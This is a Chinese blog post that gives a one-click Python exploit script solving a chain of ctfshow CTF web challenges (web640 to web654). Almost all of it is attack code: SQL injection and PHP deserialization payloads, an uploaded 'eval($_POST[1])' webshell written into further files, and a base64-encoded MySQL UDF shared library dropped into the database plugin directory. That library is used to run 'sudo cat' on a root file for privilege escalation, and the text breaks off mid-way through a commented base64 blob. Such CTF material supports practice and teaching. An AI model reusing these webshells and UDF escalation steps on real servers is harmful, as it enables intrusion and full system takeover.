ctfshow终极考核(一键通关脚本)

原创 已于 2022-01-19 19:48:55 修改 · 3.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全 #开发语言

于 2022-01-03 20:58:45 首次发布
本文详细记录了一次CTF靶机挑战过程,包括利用web漏洞获取flag、模拟数据备份、生成并执行恶意代码等实战技巧,展现了渗透测试与漏洞利用的综合能力。

由于某些原因,可能会出现失败的情况,这时候需要重新开个靶机。

import requests
import re
import time
import base64
import urllib

url="http://acfb991e-8e05-4683-9927-7b8778dea28e.challenge.ctf.show/"
sess=requests.session()
#web640
print(re.findall('flag.*?=ctfshow{.*?}',requests.get(url).text)[0])
#web641
print(sess.get(url).headers['Flag'])

#web642
print(re.findall('flag.*?=ctfshow{.*?}',sess.get(url+'system36d').text)[0])

#web643
sess.get(url+'system36d/checklogin.php?s=10')
print(urllib.parse.unquote(sess.get(url+'system36d/secret.txt').text))

#web644
print(re.findall('flag.*?=ctfshow{.*?}',sess.get(url+'system36d/static/js/lock/index.js').text)[0])

#web645
print(re.findall('flag.*?=ctfshow{.*?}',sess.get(url+'system36d/users.php?action=backup').text)[0])

#web646
print(re.findall('flag.*?=ctfshow{.*?}',sess.get(url+'system36d/users.php?action=remoteUpdate&auth=ctfshow{28b00f799c2e059bafaa1d6bda138d89}&update_address=init.php').text)[1])

#web647
print(re.findall('flag.*?=ctfshow{.*?}',sess.get(url+'system36d/users.php?action=evilString&m=session_id',headers={
   
   'Cookie':'PHPSESSID=372619038'}).text)[0])

#web648
print(re.findall('flag.*?=ctfshow{.*?}',sess.get(url+'system36d/users.php?action=evilClass&m=1&key=flag_647=ctfshow{e6ad8304cdb562971999b476d8922219}',headers={
   
   'Cookie':'PHPSESSID=372619038'}).text)[0])
#web649

u=url+"system36d/users.php?action=evilNumber&m=18&key=flag_648=ctfshow{af5b5e411813eafd8dc2311df30b394e}"
while True:
    r=requests.get(u)
    if "ctf" in r.text:
        print(r.text)
        break


#web650
print(sess.get(url+'system36d/users.php?action=evilFunction&m=session_id&key=flag_649=ctfshow{9ad80fcc305b58afbb3a0c2097ac40ef}',headers={
   
   'Cookie':'PHPSESSID=ffffffff'}).text)

#web651
'''
<?php
class a{
    public $username='123';
    public $x="ctfshow";
}
$a=new a();
echo serialize($a);
'''

print(sess.get(url+'system36d/users.php?action=evilArray&m=O:1:"a":2:{s:8:"username";s:3:"123";s:7:"ctfshow";s:7:"ctfshow";}&key=flag_650=ctfshow{5eae22d9973a16a0d37c9854504b3029}',headers={
   
   'Cookie':'PHPSESSID=ffffffff'}).text)

#web652
print(re.findall('flag.*?=ctfshow{.*?}',sess.get(url+'page.php?id=0) union select secret from ctfshow_secret%23').text)[0])


#模拟数据备份
files={
   
   'file':('1.dat',"<?php eval($_POST[1]);echo 123;?>","application/ms-tnef")} 

#生成木马
sess.post(url+"system36d/users.php?action=upload",files=files)
data1={
   
   "key":"key_is_here_you_know","file":"../db/data_you_never_know.db","1":"file_put_contents('a.php','<?php eval($_POST[1]);?>');"}
sess.post(url+'system36d/util/common.php?k=flag_651=ctfshow{a4c64b86d754b3b132a138e3e0adcaa6}',data=data1)

#web653
print(sess.post(url+"system36d/util/a.php",data={
   
   '1':'echo `cat /s*`;'}).text)
#写入木马
sess.post(url+"system36d/util/a.php",data={
   
   '1':'file_put_contents("/var/www/html/1.php","<?php eval(\$_POST[1]);?>");'})


#udf提权
data2={
   
   '1':'''`echo "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AAAAAAAAAABnAAAAAQAAADIAAAAAAAAAhhEAAAAAAACGEQAAAAAAAN0AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAbwAAAAEAAAACAAAAAAAAAGQSAAAAAAAAZBIAAAAAAACcAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAH0AAAABAAAAAgAAAAAAAAAAEwAAAAAAAAATAAAAAAAAFAIAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACHAAAAAQAAAAMAAAAAAAAAGBUgAAAAAAAYFQAAAAAAABAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAjgAAAAEAAAADAAAAAAAAACgVIAAAAAAAKBUAAAAAAAAQAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAJUAAAABAAAAAwAAAAAAAAA4FSAAAAAAADgVAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACaAAAABgAAAAMAAAAAAAAAQBUgAAAAAABAFQAAAAAAAJABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAowAAAAEAAAADAAAAAAAAANAWIAAAAAAA0BYAAAAAAAAYAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAKgAAAABAAAAAwAAAAAAAADoFiAAAAAAAOgWAAAAAAAAmAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAACxAAAAAQAAAAMAAAAAAAAAgBcgAAAAAACAFwAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAtwAAAAgAAAADAAAAAAAAAIgXIAAAAAAAiBcAAAAAAAAQAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAALwAAAABAAAAAAAAAAAAAAAAAAAAAAAAAIgXAAAAAAAAmwAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAjGAAAAAAAAMUAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA" > /tmp/a.so;cat  /tmp/a.so|base64 -d > /usr/lib/mariadb/plugin/b.so`;
'''}
sess.post(url+"1.php",data=data2)
sess.post(url+"1.php",data={
   
   '1':'`mysql -uroot -proot -e "create function sys_eval returns string soname \'b.so\'"`;'})
cmd='''mysql -uroot -proot -e "select sys_eval('sudo cat /root/you_win')"'''
cmd=base64.b64encode(cmd.encode()).decode()
datax={
   
   '1':'echo `echo {0}|base64 -d|sh`;'.format(cmd)}
# web654
print(re.findall('flag_.*?=ctfshow{.*?}',sess.post(url+"1.php",data=datax).text)[0])

#udf提权
#sess.post(url+"1.php",data={'1':'`echo W1BIUF0KCjs7Ozs7Ozs7Ozs7Ozs7Ozs7OzsKOyBBYm91dCBwaHAuaW5pICAgOwo7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7CjsgUEhQJmFwb3M7cyBpbml0aWFsaXphdGlvbiBmaWxlLCBnZW5lcmFsbHkgY2FsbGVkIHBocC5pbmksIGlzIHJlc3BvbnNpYmxlIGZvcgo7IGNvbmZpZ3VyaW5nIG1hbnkgb2YgdGhlIGFzcGVjdHMgb2YgUEhQJmFwb3M7cyBiZWhhdmlvci4KCjsgUEhQIGF0dGVtcHRzIHRvIGZpbmQgYW5kIGxvYWQgdGhpcyBjb25maWd1cmF0aW9uIGZyb20gYSBudW1iZXIgb2YgbG9jYXRpb25zLgo7IFRoZSBmb2xsb3dpbmcgaXMgYSBzdW1tYXJ5IG9mIGl0cyBzZWFyY2ggb3JkZXI6CjsgMS4gU0FQSSBtb2R1bGUgc3BlY2lmaWMgbG9jYXRpb24uCjsgMi4gVGhlIFBIUFJDIGVudmlyb25tZW50IHZhcmlhYmxlLiAoQXMgb2YgUEhQIDUuMi4wKQo7IDMuIEEgbnVtYmVyIG9mIHByZWRlZmluZWQgcmVnaXN0cnkga2V5cyBvbiBXaW5kb3dzIChBcyBvZiBQSFAgNS4yLjApCjsgNC4gQ3VycmVudCB3b3JraW5nIGRpcmVjdG9yeSAoZXhjZXB0IENMSSkKOyA1LiBUaGUgd2ViIHNlcnZlciZhcG9zO3MgZGlyZWN0b3J5IChmb3IgU0FQSSBtb2R1bGVzKSwgb3IgZGlyZWN0b3J5IG9mIFBIUAo7IChvdGhlcndpc2UgaW4gV2luZG93cykKOyA2LiBUaGUgZGlyZWN0b3J5IGZyb20gdGhlIC0td2l0aC1jb25maWctZmlsZS1wYXRoIGNvbXBpbGUgdGltZSBvcHRpb24sIG9yIHRoZQo7IFdpbmRvd3MgZGlyZWN0b3J5ICh1c3VhbGx5IEM6XHdpbmRvd3MpCjsgU2VlIHRoZSBQSFAgZG9jcyBmb3IgbW9yZSBzcGVjaWZpYyBpbmZvcm1hdGlvbi4KOyBodHRwOi8vcGhwLm5ldC9jb25maWd1cmF0aW9uLmZpbGUKCjsgVGhlIHN5bnRheCBvZiB0aGUgZmlsZSBpcyBleHRyZW1lbHkgc2ltcGxlLiAgV2hpdGVzcGFjZSBhbmQgbGluZXMKOyBiZWdpbm5pbmcgd2l0aCBhIHNlbWljb2xvbiBhcmUgc2lsZW50bHkgaWdub3JlZCAoYXMgeW91IHByb2JhYmx5IGd1ZXNzZWQpLgo7IFNlY3Rpb24gaGVhZGVycyAoZS5nLiBbRm9vXSkgYXJlIGFsc28gc2lsZW50bHkgaWdub3JlZCwgZXZlbiB0aG91Z2gKOyB0aGV5IG1pZ2h0IG1lYW4gc29tZXRoaW5nIGluIHRoZSBmdXR1cmUuCgo7IERpcmVjdGl2ZXMgZm9sbG93aW5nIHRoZSBzZWN0aW9uIGhlYWRpbmcgW1BBVEg9L3d3dy9teXNpdGVdIG9ubHkKOyBhcHBseSB0byBQSFAgZmlsZXMgaW4gdGhlIC93d3cvbXlzaXRlIGRpcmVjdG9yeS4gIERpcmVjdGl2ZXMKOyBmb2xsb3dpbmcgdGhlIHNlY3Rpb24gaGVhZGluZyBbSE9TVD13d3cuZXhhbXBsZS5jb21dIG9ubHkgYXBwbHkgdG8KOyBQSFAgZmlsZXMgc2VydmVkIGZyb20gd3d3LmV4YW1wbGUuY29tLiAgRGlyZWN0aXZlcyBzZXQgaW4gdGhlc2UKOyBzcGVjaWFsIHNlY3Rpb25zIGNhbm5vdCBiZSBvdmVycmlkZGVuIGJ5IHVzZXItZGVmaW5lZCBJTkkgZmlsZXMgb3IKOyBhdCBydW50aW1lLiBDdXJyZW50bHksIFtQQVRIPV0gYW5kIFtIT1NUPV0gc2VjdGlvbnMgb25seSB3b3JrIHVuZGVyCjsgQ0dJL0Zhc3RDR0kuCjsgaHR0cDovL3BocC5uZXQvaW5pLnNlY3Rpb25zCgo7IERpcmVjdGl2ZXMgYXJlIHNwZWNpZmllZCB1c2luZyB0aGUgZm9sbG93aW5nIHN5bnRheDoKOyBkaXJlY3RpdmUgPSB2YWx1ZQo7IERpcmVjdGl2ZSBuYW1lcyBhcmUgKmNhc2Ugc2Vuc2l0aXZlKiAtIGZvbz1iYXIgaXMgZGlmZmVyZW50IGZyb20gRk9PPWJhci4KOyBEaXJlY3RpdmVzIGFyZSB2YXJpYWJsZXMgdXNlZCB0byBjb25maWd1cmUgUEhQIG9yIFBIUCBleHRlbnNpb25zLgo7IFRoZXJlIGlzIG5vIG5hbWUgdmFsaWRhdGlvbi4gIElmIFBIUCBjYW4mYXBvczt0IGZpbmQgYW4gZXhwZWN0ZWQKOyBkaXJlY3RpdmUgYmVjYXVzZSBpdCBpcyBub3Qgc2V0IG9yIGlzIG1pc3R5cGVkLCBhIGRlZmF1bHQgdmFsdWUgd2lsbCBiZSB1c2VkLgoKOyBUaGUgdmFsdWUgY2FuIGJlIGEgc3RyaW5nLCBhIG51bWJlciwgYSBQSFAgY29uc3RhbnQgKGUuZy4gRV9BTEwgb3IgTV9QSSksIG9uZQo7IG9mIHRoZSBJTkkgY29uc3RhbnRzIChPbiwgT2ZmLCBUcnVlLCBGYWxzZSwgWWVzLCBObyBhbmQgTm9uZSkgb3IgYW4gZXhwcmVzc2lvbgo7IChlLmcuIEVfQUxMICZhbXA7IH5FX05PVElDRSksIGEgcXVvdGVkIHN0cmluZy